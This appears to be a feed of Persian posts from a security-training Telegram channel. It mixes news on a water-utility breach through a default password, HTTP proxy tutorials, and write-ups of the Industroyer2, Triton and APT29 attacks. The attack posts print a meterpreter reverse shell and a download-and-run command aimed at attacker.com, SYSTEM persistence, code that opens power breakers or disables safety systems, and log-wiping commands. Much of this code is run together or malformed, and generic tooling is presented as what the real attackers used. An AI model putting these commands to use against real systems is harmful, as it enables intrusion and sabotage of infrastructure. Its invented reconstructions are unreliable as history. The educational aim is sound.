🚨 نفوذ هکرها به تاسیسات آب آمریکا با رمز عبور پیش‌فرض "1111"

هفته گذشته، یک گروه هکری توانست فقط با استفاده از رمز عبور ساده و پیش‌فرض 1111 کنترل بخشی از سیستم مدیریت تاسیسات آب‌رسانی در یکی از ایالت‌های آمریکا را به‌دست بگیرد
این سیستم‌ها معمولاً برای کنترل فشار آب، ترکیب مواد شیمیایی تصفیه و سطح مخازن استفاده می‌شوند. هک شدن چنین سیستمی می‌تواند امنیت عمومی را به خطر بیندازد و بله، هنوز هم در سال 2025 چنین رمزهایی کار می‌کنند!

⚠️ وقتی یک سیستم حیاتی مثل آب‌رسانی یا برق، فقط با یک رمز ساده قابل هک باشد، نتایجش می‌تواند فاجعه‌بار باشد به عنوان مثال

- آلودگی عمدی آب آشامیدنی
- قطع گسترده برق یا اختلال در خدمات شهری
 ـ ارسال هشدارهای جعلی یا ایجاد وحشت عمومی
 ـ  حمله باج‌افزاری به بیمارستان، بانک یا اداره‌های دولتی
 - نفوذ به زنجیره تأمین کالاها و گسترش بدافزارها

✅ پیشنهاد میشه اگر شما هم از مودم، دوربین، دستگاه هوشمند یا حتی گوشی استفاده می‌کنید، موارد زیر را جدی بگیرید

     - هیچ‌وقت از رمز پیش‌فرض استفاده نکنید (مثل 1234 یا admin)
     - دستگاه‌های هوشمند را بدون رمز یا با پورت باز به اینترنت وصل نکنید
     - رمزها را هر چند وقت یک‌بار تغییر دهید
     - از احراز هویت دومرحله‌ای استفاده کنید، مخصوصاً در ایمیل، واتساپ و شبکه‌های اجتماعی

🟠 سخن نهایی
امنیت فقط مخصوص هکرها یا دولت‌ها نیست و همه ما در زنجیره امنیت نقش داریم.

📚 منبع اصلی خبر
https://thehackernews.com/2025/07/manufacturing-security-why-default.html

✍️نویسنده
@TryHackBox| The Chaos

#CyberSecurity #SCADA #ICS #Hacking #news #CriticalInfrastructure #IOTSecurity #IndustrialSecurity #CyberAttack #2025Security

🔖 بازگشت سایه‌ی استاکس‌نت – قسمت اول
حمله واقعی به زیرساخت برق اوکراین با Industroyer2

💠 حمله پیشرفته‌ای از نوع ICS Targeted Malware توسط گروه APT روسی (Sandworm) تو سال ۲۰۲۲، گروه هکری وابسته به اطلاعات نظامی روسیه (GRU) با نام Sandworm حمله‌ای بزرگ و واقعی به زیرساخت برق اوکراین انجام داد. این حمله نسخه‌ای ارتقایافته از بدافزار معروف استاکس‌نت بود که بهش لقب دادن:

Industroyer2

این حمله به‌قصد خاموشی گسترده و بی‌ثباتی در مناطق حساس در اوکراین طراحی شده بود، دقیقاً همزمان با حمله‌ی نظامی روسیه.
حالا تو این دو قسمت، این حمله رو در ۵ فاز عملیاتی بررسی می‌کنیم.

📌 فاز اول: شناسایی و جمع‌آوری اطلاعات از شبکه برق (ICS Recon)
هکرها قبل از حمله، با استفاده از ابزارها و تکنیک‌های OSINT و دسترسی اولیه به شبکه، ساختار سیستم برق و نوع تجهیزات ICS رو شناسایی کردن.

🛠 ابزارهای مورد استفاده:
< — Shodan — >
پیدا کردن PLCها و HMIهای متصل به اینترنت

< — Wireshark — >
برای بررسی پروتکل‌های صنعتی مثل IEC-104، Modbus, DNP3

< — Nmap — >
با اسکریپت‌های مخصوص ICS

< — FOCA — >
برای جمع‌آوری متادیتای فایل‌های منتشرشده توسط شرکت برق

< — Active Directory Enum — >
برای کشف سیستم‌های مهندسی در شبکه داخلی

اسکن نمونه با Nmap:

nmap -sS -p 2404 --noscript=modbus-discover 10.10.0.0/16 

استخراج اطلاعات PLC از ترافیک IEC-104 با Wireshark:
iec104.asdu.typeid == 45 || iec104.asdu.typeid == 46


📌 فاز دوم: ورود به شبکه و اجرای اولیه بدافزار
گزارش CERT-UA نشون می‌ده که Sandworm از حساب RDP یکی از مهندسین شبکه وارد سیستم شده و از طریق یک فایل آلوده بدافزار رو مستقر کرده.

🔶 روش‌های ورود
سرقت رمز عبور از طریق فیشینگ یا Keylogger
استفاده از RDP Credentialهای لو رفته
اجرای فایل EXE مخرب با دسترسی SYSTEM

نمونه بدافزار ساخته‌شده با msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > industroyer2.exe

ایجاد Persistence:

schtasks /create /tn "SCADA Sync" /tr "C:\ProgramData\industroyer2.exe" /sc onlogon /ru SYSTEM 

📌 فاز سوم: ارتباط مستقیم با PLC و تخریب زیرساخت
بدافزار Industroyer2 به‌صورت مستقیم به PLCهای شبکه برق وصل می‌شه و با استفاده از پروتکل IEC-104 دستور باز یا بسته‌کردن بریکرها (Breaker) رو صادر می‌کنه.

🔶 ساختار عملکرد بدافزار:
- اتصال TCP به پورت 2404 (IEC-104)
- ارسال دستور Single Command برای باز کردن بریکر
- ارسال دستور Double Command برای شبیه‌سازی فرمان مهندسی قانونی

نمونه کد Python برای باز کردن Breaker:

from iec104 import IEC104Client client = IEC104Client("10.0.0.12", 2404) client.connect() 
Cause = Spontaneous client.send_command(asdu_type=45, ioa=101, value=0) # breaker open client.disconnect() 

فایل کانفیگ شبکه در بدافزار:
{ "targets": [ {"ip": "10.0.0.12", "type": "siemens", "breaker_id": 101}, {"ip": "10.0.0.15", "type": "schneider", "breaker_id": 110} ], "payload_type": "iec104", "command": "breaker_open" }


📌 فاز چهارم: پاکسازی ردپا و لاگ‌ها
بعد از اجرا، بدافزار تلاش می‌کنه ردپاهای خودش رو پاک کنه

دستورات استفاده‌شده:

wevtutil cl System wevtutil cl Application Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force 

📌 فاز پنجم: شناسایی حمله و مقابله توسط CERT-UA
مرکز پاسخ اضطراری اوکراین تونست حمله رو در لحظه آخر شناسایی کنه.
تحلیل نمونه Industroyer2 نشون داد که فقط روی سیستم‌های خاص با تجهیزات SCADA فعال می‌شه.
با بررسی لاگ‌های شبکه و دسترسی مشکوک از RDP کشف و فایل EXE با نام جعلی update_driver.exe روی سیستم مهندسین دیده شد.

🔶 روش‌های دفاعی پیشنهادی
- استفاده از ابزارهای تخصصی ICS مانند Nozomi و Dragos
- ایزوله‌کردن کامل سیستم‌های SCADA و PLC از شبکه IT
- بررسی ترافیک پورت 2404 با Suricata/Zeek برای دستورات مشکوک
- تحلیل Signatureهای پروتکل IEC-104

📌 این حمله ادامه‌ی استاکس‌نت بود؛ با دقت بیشتر، طراحی خاص برای اوکراین و قابلیت اجرای فرمان مستقیم روی شبکه برق. این حمله نشون داد که تو دنیای جنگ‌های مدرن، کلید برق یه کشور می‌تونه با یه packet خاموش بشه.

✍️نویسنده
@TryHackBox| Condor

#ICS #SCADA #CyberWarfare #APT #Industroyer #InfoSec

🚀 آموزش Proxies (پارت 0)

📌 پروکسی‌ها در واقع واسطه‌هایی هستند که بین کلاینت‌ها و سرورها قرار می‌گیرند و به عنوان یک سرور پروکسی عمل می‌کنند. باهم درباره‌ی سرورهای پروکسی صحبت می‌کنیم که چگونه درخواست‌های HTTP را بین طرفین (کلاینت و سرور) به جلو و عقب منتقل می‌کنند.

🔍 مباحثی که در سری پست ها به آن‌ها پرداخته می‌شود:
✅ نحوه قرارگیری پروکسی‌ها در مقابل دروازه‌ها و استقرار آن‌ها در HTTP
✅ راه‌هایی که پروکسی‌ها می‌توانند مفید باشند و به ما کمک کنند
✅ نحوه استقرار پروکسی‌ها در شبکه‌های واقعی و هدایت ترافیک به سرورهای پروکسی
✅ روش پیکربندی مرورگر برای استفاده از پروکسی
✅ تفاوت درخواست‌های پروکسی با درخواست‌های مستقیم به سرور و تأثیر پروکسی‌ها بر رفتار مرورگرها
✅ چگونگی ردیابی مسیر درخواست‌ها با استفاده از هدرهای Via و متد TRACE
✅ کنترل دسترسی مبتنی بر پروکسی در HTTP
✅ تعامل پروکسی‌ها با سرورها و کلاینت‌هایی که نسخه‌ها و ویژگی‌های متفاوتی از HTTP را پشتیبانی می‌کنند

✍️نویسنده
@TryHackBox| The Chaos

#HTTP #Proxy #CyberSecurity

📌 پروکسی‌ها در واقع واسطه‌هایی هستند که بین کلاینت‌ها و سرورها قرار می‌گیرند و مانند یک نماینده عمل می‌کنند.

🌍 مثال روزمره:
فرض کنید می‌خواهید نامه‌ای به یک شرکت بفرستید، اما به جای ارسال مستقیم، آن را به دفتر پستی می‌سپارید. دفتر پستی نامه را دریافت می‌کند، آدرس را بررسی می‌کند، سپس آن را به مقصد نهایی می‌رساند. حتی ممکن است قبل از ارسال، محتوای نامه را بررسی کند یا آن را در یک پاکت جدید بگذارد.

🔹 پروکسی هم دقیقاً همین‌طور کار می‌کند!

وقتی شما به اینترنت متصل می‌شوید، درخواست‌های شما ابتدا به پروکسی می‌رود.

پروکسی می‌تواند درخواست را تغییر دهد، فیلتر کند یا کش کند و سپس به سرور اصلی ارسال کند.

پاسخ سرور هم ابتدا به پروکسی برمی‌گردد و بعد به شما می‌رسد.

💡 پروکسی مثل همان دفتر پستی است: واسطه‌ای که ارتباط شما با دنیای اینترنت را مدیریت می‌کند!

🔍 واسطه‌های وب (Web Intermediaries) چیستند؟

تصور کنید می‌خواهید با یک فروشگاه آنلاین ارتباط برقرار کنید:

📱 بدون پروکسی (ارتباط مستقیم):
شما (کلاینت) ← مستقیماً به فروشگاه (سرور)

🖥 با پروکسی (ارتباط با واسطه):
شما ← پروکسی ← فروشگاه

✨ به زبان ساده:
پروکسی مثل یک رابط هوشمند عمل می‌کند که:

     - درخواست‌های شما را دریافت می‌کند

     - به جای شما با سرور اصلی ارتباط برقرار می‌کند

     - پاسخ را از سرور گرفته

     - و در نهایت آن را به شما تحویل می‌دهد

💡 مثل یک مترجم یا نماینده: دقیقاً همانطور که در مذاکرات بین‌المللی از مترجم استفاده می‌شود، پروکسی هم بین شما و سرورهای اینترنتی واسطه می‌شود تا ارتباط به بهترین شکل ممکن برقرار شود.

🌐 نحوه عملکرد:

     - بدون پروکسی، کلاینت‌ها مستقیماً با سرورهای HTTP ارتباط برقرار می‌کنند

     - با وجود پروکسی، کلاینت با سرور پروکسی صحبت می‌کند

     - پروکسی به نمایندگی از کلاینت با سرور اصلی ارتباط برقرار می‌نماید

     - کلاینت تراکنش را کامل انجام می‌دهد، اما از خدمات ارزشمند پروکسی بهره می‌برد

🔄 ویژگی‌های کلیدی:

     - هم به عنوان سرور وب (برای کلاینت)

     - هم به عنوان کلاینت وب (برای سرور اصلی) عمل می‌کند

     - درخواست‌های HTTP را به سرورهای مناسب ارسال می‌کند

     - اتصالات و درخواست‌ها را مدیریت می‌نماید

     - پاسخ‌ها را دقیقاً مانند یک وب سرور بازمی‌گرداند

⚙️ مهم‌ترین وظایف:

     - ارسال درخواست‌های HTTP به سرورها

     - دریافت و پردازش پاسخ‌ها

     - رعایت دقیق پروتکل‌های HTTP

     - مدیریت صحیح تراکنش‌ها بین کلاینت و سرور

✍️نویسنده
@TryHackBox| The Chaos

#HTTP #Proxy #CyberSecurity

🔥 نمونه‌ای از چک‌لیست برای یک buughunter و pentester با 500 مورد تست، بر اساس OWASP.

#bugbounty
@TryHackBox

💢 مهندسی اجتماعی در رد تیمینگ

در حوزه‌ی امنیت سایبری، عنصر انسانی اغلب ضعیف‌ترین قسمت است. مهندسی اجتماعی از این ضعف بهره‌برداری می‌کند و با فریب افراد، آن‌ها را وادار به فاش کردن اطلاعات محرمانه یا انجام اقداماتی می‌کند که امنیت را به خطر می‌اندازد. برای اعضای رد تیم ، تسلط بر فنون مهندسی اجتماعی بسیار مهم است تا بتوانند حملاتی واقعی را شبیه‌سازی کرده و مقاومت سازمان در برابر این تهدیدات را ارزیابی کنند. به زودی به جزئیات مهندسی اجتماعی، روش‌ها، ابزارها، فنون و تأثیر عمیقی که می‌تواند بر امنیت سازمانی بگذارد می‌پردازیم.

به زودی ....
#مهندسی_اجتماعی
@TryHackBox

🔖بازگشت سایه‌ی استاکس‌نت – قسمت دوم
بدافزاری که سیستم‌های ایمنی صنعتی (SIS) رو هدف گرفت

💠 حمله واقعی به تأسیسات پتروشیمی و نیروگاه‌ها با هدف ایجاد فاجعه انسانی


📌 فاز اول: شناخت سیستم‌های SIS و آسیب‌پذیری‌ها
سیستم‌های SIS (Safety Instrumented Systems) وظیفه قطع خودکار و فوری عملیات خطرناک در کارخانه‌ها و نیروگاه‌ها رو دارند تا از وقوع انفجار یا نشت مواد سمی جلوگیری کنند. Triton طوری طراحی شده که این سیستم‌ها رو خاموش کنه یا کنترل‌شون رو بدست بگیره.

💻 سیستم‌های هدف:
Triconex SIS ساخت Schneider Electric
PLCهای خاص با دسترسی شبکه به پورت 18245


📌 فاز دوم: نفوذ به شبکه ICS و نصب بدافزار
گزارش FireEye نشون داده که مهاجم‌ها ابتدا به شبکه IT نفوذ کردند و از اونجا به شبکه کنترل صنعتی نفوذ کردند. بعد با استفاده از دسترسی‌های RDP یا VPN غیرمجاز، بدافزار Triton رو روی سرور مهندسی نصب کردند.

نمونه دستورات نصب بدافزار:

Invoke-WebRequest -Uri http://attacker.com/triton.exe -OutFile C:\Windows\Temp\triton.exe Start-Process -FilePath C:\Windows\Temp\triton.exe 

📌 فاز سوم: ارتباط مستقیم با PLCهای Triconex و تغییر عملکرد
بدافزار با استفاده از پروتکل اختصاصی Triconex، با PLCهای SIS ارتباط برقرار می‌کنه و کدهای امنیتی رو تغییر می‌ده یا کاملاً سیستم رو از کار می‌اندازه.

نمونه کد بازسازی‌شده (Pseudo Python):

import socket def send_triton_cmd(ip, port, payload): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(payload) response = s.recv(1024) s.close() return response
payload = b'\x01\x03\x00\x00\x00\x06\xC5\xCD'
response = send_triton_cmd("10.10.10.5", 18245, payload) print("Response:", response)

📌فاز چهارم: ایجاد خاموشی و نابودی عملکرد ایمنی
با اجرای فرمان‌های بدافزار، سیستم‌های ایمنی به حالت Fail-safe نمی‌رن بلکه خاموش می‌شن، این یعنی حتی اگر خطری وجود داشته باشه، سیستم به وظیفه‌اش عمل نمی‌کنه و باعث حادثه بزرگ می‌شه.
فاز پنجم: پاک‌سازی ردپا و استتار
توطئه‌گران ردپای خود را با حذف لاگ‌ها و بازنویسی تاریخچه فرمان‌ها پاک کردند.

دستورات پاک‌سازی:

wevtutil cl Security wevtutil cl System Clear-EventLog -LogName "Application"

🔶 روش‌های مقابله و پیشگیری
- پیاده‌سازی فیلترهای دقیق در فایروال‌های صنعتی
- نظارت بر ترافیک پورت 18245 و تشخیص رفتارهای غیرمعمول
- آموزش کارکنان به ویژه مهندسین شبکه برای جلوگیری از فیشینگ
- استفاده از سیستم‌های IDS/IPS تخصصی برای ICS
- ایزوله‌سازی شبکه کنترل صنعتی از شبکه عمومی و اینترنت


📌 بدافزار Triton یک هشدار جدی به صنایع حساس و زیرساخت‌های حیاتی جهان است که حمله‌های سایبری می‌توانند به قیمت جان انسان‌ها تمام شوند. کنترل سیستم‌های ایمنی صنعتی دیگر یک گزینه نیست، یک ضرورت حیاتی است.

✍️نویسنده
@TryHackBox| Condor

#ICS #SCADA #CyberWarfare #APT #Triton #InfoSec

🚨 ۹۵٪ از شرکت‌های آمریکایی از هوش مصنوعی مولد (Generative AI) استفاده می‌کنند — اغلب بدون اطلاع تیم IT!

🧠 ابزارهای هوش مصنوعی مثل ChatGPT، Gemini، Copilot و Claude در حال حاضر در اکثر شرکت‌ها مورد استفاده قرار می‌گیرند. اما مشکل کجاست؟

📤 داده‌های حساس شامل اطلاعات مشتری، کد منبع، قراردادها و حتی اطلاعات مالی بدون هیچ نظارت یا محدودیتی وارد این ابزارها می‌شوند.

⚠️ این پدیده جدید به نام "Shadow AI" شناخته می‌شود:
استفاده پنهانی از هوش مصنوعی توسط کارمندان، بدون هماهنگی با واحد IT یا امنیت.

📚 منبع اصلی خبر:
The Hacker News – Shadow AI in 2025

✍️نویسنده
@TryHackBox | TheChaos

#ShadowAI #AIsecurity #DataPrivacy #GenerativeAI #CyberSecurity #AIThreats #GPT #InfoSec #News

💢 مهندسی اجتماعی در رد تیمینگ

در حوزه‌ی امنیت سایبری، عنصر انسانی اغلب ضعیف‌ترین قسمت است. مهندسی اجتماعی از این ضعف بهره‌برداری می‌کند و با فریب افراد، آن‌ها را وادار به فاش کردن اطلاعات محرمانه یا انجام اقداماتی می‌کند که امنیت را به خطر می‌اندازد. برای اعضای رد تیم ، تسلط بر فنون مهندسی اجتماعی بسیار مهم است تا بتوانند حملاتی واقعی را شبیه‌سازی کرده و مقاومت سازمان در برابر این تهدیدات را ارزیابی کنند. به زودی به جزئیات مهندسی اجتماعی، روش‌ها، ابزارها، فنون و تأثیر عمیقی که می‌تواند بر امنیت سازمانی بگذارد می‌پردازیم.


#مهندسی_اجتماعی
@TryHackBox

🚀 آموزش Proxies (پارت 1)

🔵 انواع پروکسی: اختصاصی، اشتراکی و عمومی

پروکسی اختصاصی (Private Proxy):
این نوع پروکسی به یک کاربر یا کلاینت خاص اختصاص داده میشود و به آن پروکسی خصوصی میگویند. مناسب برای استفاده های شخصی، افزایش امنیت و حفظ حریم خصوصی.

پروکسی اشتراکی (Shared Proxy):
این پروکسی بین چندین کاربر به اشتراک گذاشته میشود و به آن پروکسی معمولی میگویند. مقرون به صرفه تر است، اما ممکن است سرعت و امنیت کمتری داشته باشد.

پروکسی عمومی (Public Proxy):
رایگان و برای عموم قابل دسترس است. معمولاً توسط سرویسهای مختلف ارائه میشود، اما به دلیل استفادهی همزمان کاربران زیاد، ممکن است ناپایدار یا کند باشد.

🔹 کاربردها:

   - پروکسی اختصاصی: مناسب برای فعالیتهای حساس، مانند مدیریت چند اکانت یا دور زدن محدودیت ها.

   - پروکسی اشتراکی: گزینه ی اقتصادی برای کاربران عادی.

   - پروکسی عمومی: برای دسترسی سریع و موقت، اما با ریسک امنیتی بالاتر.

✅ انتخاب هوشمندانه پروکسی = امنیت + سرعت + کارایی بهتر!

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Proxy #CyberSecurity

🔵 تفاوت Proxy و Gateway در یک نگاه

📌 Proxy:

* مانند یک واسطهٔ نامرئی عمل می‌کند.
* برنامه‌ها با پروتکل یکسان (مثل HTTP) را به هم متصل می‌کند.

مثال کاربردی:
وقتی از یک پروکسی برای عبور از فیلترینگ استفاده می‌کنید، مرورگر شما (کلاینت) و سرور مقصد هر دو از پروتکل HTTP/HTTPS استفاده می‌کنند. پروکسی در میان آنها قرار می‌گیرد تا ارتباط را تغییر مسیر دهد.



📌 Gateway:

* مانند یک مترجم بین دو سیستم با پروتکل‌های متفاوت عمل می‌کند.
* برنامه‌ها با پروتکل‌های مختلف (مثل HTTP به SMTP) را به هم متصل می‌کند.

مثال کاربردی:
وقتی ایمیل خود را از طریق مرورگر (HTTP) چک می‌کنید، Gateway پروتکل HTTP را به SMTP یا POP (پروتکل‌های ایمیل) تبدیل می‌کند تا بتوانید پیام‌ها را دریافت کنید.



🔵 مقایسه عملکرد

📌 Proxy:

* مرورگر (Browser) با پروتکل HTTP به پروکسی متصل می‌شود.
* پروکسی نیز با همان پروتکل HTTP به سرور وب ارتباط برقرار می‌کند.
* کاربرد: تغییر مسیر ترافیک، افزایش امنیت، یا دور زدن محدودیت‌ها.

[مرورگر (HTTP)] -> [پروکسی (HTTP)] -> [وب‌سرور (HTTP)]



📌 Gateway:

* مرورگر (Browser) با پروتکل HTTP به گیت‌وی متصل می‌شود.
* گیت‌وی، پروتکل HTTP را به POP (برای دریافت ایمیل) یا SMTP (برای ارسال ایمیل) تبدیل می‌کند.
* سپس با سرور ایمیل ارتباط برقرار می‌کند.
* کاربرد: دسترسی به ایمیل از طریق مرورگر، بدون نیاز به نرم‌افزار خاص.

[مرورگر (HTTP)] -> [Getway: تبدیل HTTP به POP] -> [سرور ایمیل (POP)]

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Proxy #CyberSecurity #Getway

نگاهی به آموزش های قبل :

بررسی جامع و دقیق درباره پروتکل Kerberos.

درمورد Recon-user بدانید .

بهترین ماشین‌های مجازی برای متخصصان امنیت سایبری .

کتاب وایرشارک برای ردتیمرها .

در ابزار Nuclei روش جدیدی برای تشخیص حملات XSS اضافه شده است!

آیا قبلاً خواسته‌اید به سرعت باگ‌های «HTTP Request Smuggling» را تست کنید؟

کتاب میمیکتز راهنمای عملی هکرها .

درمورد ابزار Evilginx3 Phishlets  بدانید .

به تحقیق در مورد امنیت وردپرس علاقه دارید؟

دور زدن احراز هویت Ruby-SAML / GitLab (CVE-2024-45409)

بازگشت سایه‌ی استاکس‌نت – قسمت اول

آموزش Proxies (پارت 0)

بازگشت سایه‌ی استاکس‌نت – قسمت دوم

مهندسی اجتماعی در رد تیمینگ

آموزش Proxies (پارت 1)

تفاوت Proxy و Gateway در یک نگاه

آموزش های قبل تر

@TryHackBox

🚀 آموزش Proxies (پارت 2)
🔹چرا از پراکسی استفاده می‌کنیم؟

سرورهای پراکسی می‌توانند امنیت را بهبود بخشند، عملکرد را افزایش دهند و در هزینه‌ها صرفه‌جویی کنند. از آنجا که سرورهای پراکسی می‌توانند تمام ترافیک عبوری را مشاهده و کنترل کنند، استفاده از آن‌ها در بسیاری از سرویس‌های مبتنی بر HTTP باعث بهبود عملکرد، نظارت، و تغییر مسیر ترافیک می‌شود.

به طور مثال:
🧒 فیلتر کودک
✅ دسترسی مجاز به محتوای آموزشی:

[Child User] 
      │
      ▼
[Browser: Dinosaurs Online]
      │
      ▼
[School's Filtering Proxy]
      │        → Analyzes requested content
      ▼
     OK       → Access granted
      ▼
[Internet] ───► [Educational Website Server]
                (Content: Dinosaurs, science, etc.)

❌ مسدودسازی دسترسی به محتوای نامناسب:

[Child User] 
      │
      ▼
[Browser: Adult Content Site]
      │
      ▼
[School's Filtering Proxy]
      │        → Detects inappropriate content
      ▼
     DENY     → Access blocked
      ✖️
(No connection to the server)

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Proxy #CyberSecurity

🔹کنترل‌کنندهٔ دسترسی به اسناد (Document Access Controller)

سرورهای پراکسی می‌توانند برای پیاده‌سازی یک استراتژی متمرکز کنترل دسترسی در مجموعه‌های بزرگ از وب‌سرورها و منابع وب مورد استفاده قرار گیرند. این کاربرد در سازمان‌های بزرگ با ساختارهای بروکراتیک، بسیار رایج و مؤثر است.

✅ مزیت اصلی:
امکان مدیریت متمرکز دسترسی بدون نیاز به پیکربندی مجزای هر سرور وب.

🔐 مثال: پراکسی کنترل دسترسی

در تصویر مفهومی زیر، یک پراکسی مرکزی تعیین می‌کند که کدام کلاینت به کدام منبع وب دسترسی داشته باشد:

[Client A] ─> [Proxy Access Controller] ─> [Server A: News Pages]
                │
                └── Allows access to news pages only

[Client B] ─> [Proxy Access Controller] ─> [All Internet Content]
                │
                └── Unlimited access allowed

[Client C] ─> [Proxy Access Controller] ─> [Server B: Requires Password]
                │
                └── Access granted only after password authentication

🔹فایروال امنیتی (Security Firewall)

مهندسان امنیت شبکه اغلب از پراکسی‌ها برای افزایش امنیت و اعمال سیاست‌های محدودکننده استفاده می‌کنند. این پراکسی‌ها به‌عنوان لایهٔ میانی بین داخل و خارج از سازمان، در نقاط امن شبکه قرار می‌گیرند.

ویژگی‌ها:

* کنترل پروتکل‌های سطح Application
* بررسی دقیق ترافیک عبوری
* امکان استفاده از Security Hooks
* قابلیت حذف یا بازنویسی درخواست‌های مخرب

🔹 کش وب (Web cache)

پراکسی کش (Proxy Cache) می‌تواند اسناد و فایل‌های محبوب را ذخیره کرده و هنگام درخواست مجدد، آن‌ها را مستقیماً ارائه دهد. این کار باعث کاهش بار شبکه و کاهش تأخیر کاربر می‌شود.

📦 مثال: اشتراک کش بین کاربران (Web Cache Sharing Example)
فرض کنید یک پراکسی کش در سازمان یا شبکه مدرسه‌ای قرار دارد. این پراکسی، اسناد و صفحات محبوبی را که کاربران قبلاً درخواست داده‌اند، در حافظهٔ خود نگه می‌دارد.

اکنون سه کاربر در شبکه هستند:

کاربر ۱ (Client 1) برای اولین بار یک سند وب (مثلاً یک مقاله یا تصویر) را درخواست می‌کند. چون این سند هنوز در کش موجود نیست، پراکسی آن را از سرور اصلی دریافت کرده و هم‌زمان، نسخه‌ای را در کش ذخیره می‌کند.

کاربر ۲ (Client 2) پس از مدتی همان سند را درخواست می‌کند. این بار پراکسی دیگر نیازی به تماس با سرور اصلی ندارد، بلکه نسخهٔ ذخیره‌شده در کش را مستقیماً برای کاربر ۲ ارسال می‌کند. این فرآیند سریع‌تر، کم‌هزینه‌تر و بهینه‌تر است.

کاربر ۳ (Client 3) می‌خواهد سندی را دریافت کند که هنوز در کش وجود ندارد یا دسترسی به آن برایش محدود شده است. بنابراین پراکسی یا باید سند را از سرور مبدا بگیرد، یا به دلیل محدودیت دسترسی (مثلاً کنترل دسترسی بر اساس نقش کاربر)، دسترسی را مسدود کند.


* کلاینت‌های 1 و 2 می‌توانند سند ذخیره‌شده در کش را دریافت کنند.
* کلاینت 3 به آن سند خاص دسترسی ندارد و باید از سرور مبدا درخواست کند.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Proxy #CyberSecurity

⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :

💠 کانال های تلگرام ما

🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox

🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial

🔶 داستان های هک
🆔 @TryHackBoxStory

🔶 آموزش برنامه نویسی
🆔 @TryCodeBox

🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod

➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ

🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup

➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox

🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/

🔥 حمله‌ی APT29 با زیرساخت C2 مخفی (CDN + HTTP/3 + DoH)
⛓️ نفوذ در سکوت مطلق – بدون هشدار، بدون رد، بدون ردگیری
🎯 مقدمه:
سال 2023، سازمان امنیت ملی آمریکا (NSA) و کمپانی امنیتی Mandiant فاش کردند که گروه هکری APT29 (ملقب به Cozy Bear)، وابسته به سرویس اطلاعات خارجی روسیه (SVR)، حمله‌ای پیشرفته به یکی از نهادهای دیپلماتیک ایالات متحده انجام داده.
اما چیزی که این حمله رو خاص و ترسناک می‌کرد، زیرساخت فرمان‌دهی و کنترل (C2) بود که به‌شکل خلاقانه و تقریباً غیرقابل شناسایی طراحی شده بود.
🧬 فاز اول: طراحی C2 مخفی (Stealth Command & Control)
APT29 به‌جای راه‌اندازی یه سرور ساده C2، اومد و زیرساخت C2 خودش رو پشت یک CDN مثل Cloudflare پنهان کرد.
🔹 نکته کلیدی: ترافیک HTTPS به CDNهای معتبر مثل Cloudflare از سمت فایروال‌ها بلاک نمی‌شن؛ چون اون‌ها معمولاً به هزاران سایت قانونی سرویس می‌دن.
🎯 بنابراین، هکرها دامنه‌ای مثل secure-portal-update.com ثبت کردن
و اون رو از طریق Cloudflare به سرور C2 اصلی خودشون route کردن.
✅ نتیجه: ارتباط implant قربانی با C2 به‌صورت HTTPS و از طریق Cloudflare انجام می‌شه، بنابراین:
ترافیک رمزنگاری شده‌ست (TLS)
مقصد ترافیک از دید SOC، فقط "cloudflare.com" دیده می‌شه
هیچ نشونه‌ای از سرور واقعی هکر وجود نداره
🌐 فاز دوم: استفاده از HTTP/3 + QUIC
اما APT29 پا رو فراتر گذاشت.
به‌جای HTTP/1.1 یا HTTP/2، از HTTP/3 (پروتکل جدید مبتنی بر QUIC) استفاده کرد. این کار چند مزیت داشت:
🔸 HTTP/3 روی UDP کار می‌کنه، نه TCP
🔸 اکثر ابزارهای بازرسی شبکه هنوز روی HTTP/3 signature ندارن
🔸 تحلیل ترافیک QUIC بسیار سخت‌تر از TLS عادیه
🔸 قابلیت تعویض مسیر سریع در صورت شناسایی
📡 بنابراین ارتباط implant با C2 به‌شکلی انجام می‌شد که حتی اگر یک تحلیل‌گر حرفه‌ای هم بسته‌ها رو sniff می‌کرد، نمی‌فهمید محتوای ترافیک چیه یا کی با کی صحبت می‌کنه.
🧠 فاز سوم: مخفی‌سازی DNS با DoH (DNS over HTTPS)
در حملات سنتی، برای وصل شدن به دامنه‌ی C2، implant باید DNS Query انجام بده؛ مثلاً بپرسه:
who is: secure-portal-update.com
و این می‌تونه توسط DNS logging شناسایی بشه.
اما APT29 به‌جای استفاده از DNS عادی، از DNS over HTTPS (DoH) استفاده کرد. یعنی:
DNS query رو داخل یک درخواست HTTPS رمزنگاری‌شده جاسازی می‌کرد
درخواست رو به سرور DoH مثل https://cloudflare-dns.com/dns-query می‌فرستاد
اون سرور، IP دامنه C2 رو براش resolve می‌کرد
📌 یعنی حتی DNS Resolver شبکه مقصد هم نمی‌فهمید چه دامین‌هایی داره resolve می‌شن.
🦠 فاز چهارم: بارگذاری و اجرای Implant در سیستم قربانی
با استفاده از مهندسی اجتماعی (مثل فایل‌های Word با ماکروهای آلوده یا فایل ISO فیشینگ)، APT29 implant رو روی سیستم قربانی اجرا کرد. این implant:
با زبان Go نوشته شده بود (برای کراس‌پلتفرم بودن و جلوگیری از شناسایی)
با UPX فشرده شده بود (برای گمراه‌کردن signatureهای آنتی‌ویروس‌ها)
به‌محض اجرا، یه Beacon به https://secure-portal-update.com می‌زد (که در واقع، پشت Cloudflare به سرور C2 وصل می‌شد)
از طریق HTTP/3 و QUIC اطلاعات می‌فرستاد
🎯 این implant با فرستادن بسته‌های دوره‌ای، آماده دریافت دستورهای از راه دور بود:
اجرای فرمان‌ها (RCE)
استخراج فایل
بارگذاری shell دومرحله‌ای
